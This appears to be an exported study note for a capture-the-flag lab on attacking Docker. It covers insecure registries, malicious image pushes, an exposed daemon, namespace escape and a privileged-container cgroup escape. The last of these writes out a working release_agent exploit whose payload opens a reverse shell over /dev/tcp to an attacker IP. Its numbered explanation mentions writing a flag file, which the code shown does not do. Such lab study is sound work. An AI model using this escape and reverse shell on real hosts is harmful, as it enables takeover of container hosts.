<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Commands/tools</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Commands/tools</h1>

      <div class="ck-content">
        <h2><strong>1st method: Online insecure docker registry(version)</strong></h2>

        <p><code>/etc/docker/daemon.json</code>

        </p><pre><code class="language-text-plain">	{
  	"insecure-registries" : ["docker-rodeo.thm:5000","docker-rodeo.thm:7000"]
	}</code></pre>

        <p>These files contain commands such as <code>RUN </code>and <code>COPY </code>that
          will be executed by the container. <code>RUN </code>commands will execute
          system commands such as <code>apt-get</code> or <code>ls /home/</code>

        </p><pre><code class="language-text-plain">docker pull rustscan/rustscan:1.8.0(or latest)</code></pre>

        <p>The Docker Registry is a JSON endpoint, so we cannot just simply interact
          with it like we would a normal website - we will have to query it. Whilst
          this can be done via the terminal or browser, dedicated tools such as
          <a
          href="https://www.postman.com/downloads/">Postman</a>or <a href="https://insomnia.rest/download/">Insomnia </a>are
            much better suited for the job.</p>
        <p><a href="http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/manifests/notsecure"><code>http://docker-rodeo.thm:5000/v2/<strong>cmnatic/myapp1</strong>/manifests/<strong>notsecure</strong></code></a>

        </p>
         <h2><strong>2nd method: Reversing image with DIVE</strong></h2>

        <p><code>dive &lt;Docker Image ID</code>

        </p>
        <p>We have four different views, we are only interested in these three views:</p>
        <p><strong>4.5.1</strong>. Layers (pictured in red)</p>
        <p><strong>4.5.1.1.</strong> This window shows the various layers and stages
          the docker container has gone through</p>
        <p><strong>4.6</strong>.<strong>1.</strong> Current Layer Contents (pictured
          in green)</p>
        <p><strong>4.6.1.1.</strong> This window shows you the contents of the container's
          filesystem at the selected layer</p>
        <p><strong>4.7.1.</strong> Layer Details (pictured in red)</p>
        <p><strong>4.7.1.1.</strong> Shows miscellaneous information such as the ID
          of the layer and any command executed in the Dockerfile for that layer.</p>
        <figure
        class="image image_resized" style="width:71.69%">
          <img src="Commandstools/using-dive2.png" />
          </figure>
           <h2><strong>3rd Method: Upload Malicious docker images</strong></h2>

          <p>we can upload (or <code>push</code>) our own images to a repository, containing
            malicious code. </p>
          <p>When a <code>docker pull</code> or <code>docker run</code> command is issued,
            Docker will first try to find a copy of the image (i.e. <strong>cmnatic/myapp1</strong>)
            on the host and then proceed to check if there have been any changes made
            on the Docker registry it was <i>pulled</i> from. If there are changes, Docker
            will download the updated image onto the host and then proceed to execute.</p>
          <figure
          class="image">
            <img src="Commandstools/image.png" />
            </figure>
            <p>We compile this into an image with <code>docker build </code>. Once compiled
              and added to the vulnerable registry, we set up a listener on our attacker
              machine and wait for the new image to be executed by the target.</p>
             <h2><strong>4th &amp; 5th Method: RCE/Escape via exposed docker daemon</strong></h2>

            <p>a UNIX socket accomplishes the same job as it's networking sibling - moving
              data, albeit all within the host itself by using the filesystem rather
              than networking interfaces/adapters</p><pre><code class="language-text-plain">docker -H tcp://10.10.46.192:2375 ps
docker -H tcp://&lt;IP&gt;:&lt;PORT&gt; exec &lt;CONTAINER ID(obtained with ps&gt; &lt;local command such as ls&gt;</code></pre>

             <h2><strong>6th Method: Shared namespaces</strong></h2>

            <p>Put simply, the process with an ID of 0 is the process that is started
              when the system boots. Processes numbers increment and must be started
              by another process, so naturally, the next process ID will be #1. This
              process is the systems <code>init</code> , for example, the latest versions
              of Ubuntu use <code>systemd</code>. Any other process that runs will be
              controlled by <code>systemd</code> (process #1).</p>
            <p>We can use process #1's namespace on an operating system to escalate our
              privileges. Whilst containers are designed to use these namespaces to isolate
              from another, they can instead, coincide with the host computers processes,
              rather than isolated from...this gives us a nice opportunity to escape!</p>
            <p>We can confirm that the container we're connected to in namespaces of
              the host by using <code>ps aux</code>. Remember how we were only expecting
              a couple of entries? Now we can see the whole systems process...</p>
            <p>We'll be invoking the <a href="https://man7.org/linux/man-pages/man1/nsenter.1.html">nsenter</a> command.
              To summarise, this command allows you to execute start processes and place
              them within the same namespace as another process. </p>
             <h2><strong>7th Method: Misconfigured privileges</strong></h2>

            <p>Containers running in "user" mode interact with the operating system through
              the Docker engine. Privileged containers, however, do not do this...instead,
              they bypass the Docker engine and have direct communication with the operating
              system.</p>
            <p>We can use a system package such as "libcap2-bin"'s <code>capsh </code>to
              list the capabilities our container has: <code>capsh --print </code>. I've
              highlighted a few interesting privileges that we have been given, but greatly
              encourage you to research into anymore that may be exploited! Privileges
              like these indicate that our container is running in privileged mode.</p>
            <figure
            class="image image_resized" style="width:1076px">
              <img src="Commandstools/listcap2.png" />
              </figure>
              <p>sys_admin" to be able to <a href="https://linux.die.net/man/2/mount">mount</a> files
                from the host OS into the container.</p>
              <p>The code snippet below is based upon (but a modified) version of the
                <a
                href="https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.">Proof of Concept (PoC) created by Trailofbits</a> where they detail the
                  inner-workings to this exploit well.</p><pre><code class="language-text-plain">mkdir /tmp/cgrp &amp;&amp; mount -t cgroup -o rdma cgroup /tmp/cgrp &amp;&amp; mkdir /tmp/cgrp/x
echo 1 &gt; /tmp/cgrp/x/notify_on_release

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" &gt; /tmp/cgrp/release_agent
echo '#!/bin/sh' &gt; /exploit
echo 'bash -c "bash -i &gt;&amp; /dev/tcp/10.9.0.233/1234 0&gt;&amp;1"' &gt;&gt; /exploit
chmod a+x /exploit
sh -c "echo \$\$ &gt; /tmp/cgrp/x/cgroup.procs"</code></pre>

              <p><strong>1.</strong> We need to create a group to use the Linux kernel to
                write and execute our exploit. The kernel uses "cgroups" to manage processes
                on the operating system since we have capabilities to manage "cgroups"
                as root on the host, we'll mount this to "<i>/tmp/cgrp</i>" on the container.</p>
              <p><strong>2</strong>. For our exploit to execute, we'll need to tell Kernel
                to run our code. By adding "1" to "<i>/tmp/cgrp/x/notify_on_release</i>",
                we're telling the kernel to execute something once the "cgroup" finishes.
                <a
                href="https://www.kernel.org/doc/Documentation/cgroup-v1/cgroups.txt">(Paul Menage., 2004)</a>
              </p>
              <p><strong>3. </strong>We find out where the containers files are stored
                on the host and store it as a variable</p>
              <p><strong>4.</strong> Where we then echo the location of the containers files
                into our "<i>/exploit</i>" and then ultimately to the "release_agent" which
                is what will be executed by the "cgroup" once it is released.</p>
              <p><strong>5.</strong> Let's turn our exploit into a shell on the host</p>
              <p><strong>6.</strong> Execute a command to echo the host flag into a file
                named "flag.txt" in the container, once "<i>/exploit</i>" is executed</p>
              <p><strong>7.</strong> Make our exploit executable!</p>
              <p><strong>8.</strong> We create a process and store that into "<i>/tmp/cgrp/x/cgroup.procs</i>"</p>
              <p>
                <br /> </p>
              <p> </p>
              <p> </p>
              <p> </p>
      </div>
    </div>
  </body>

</html>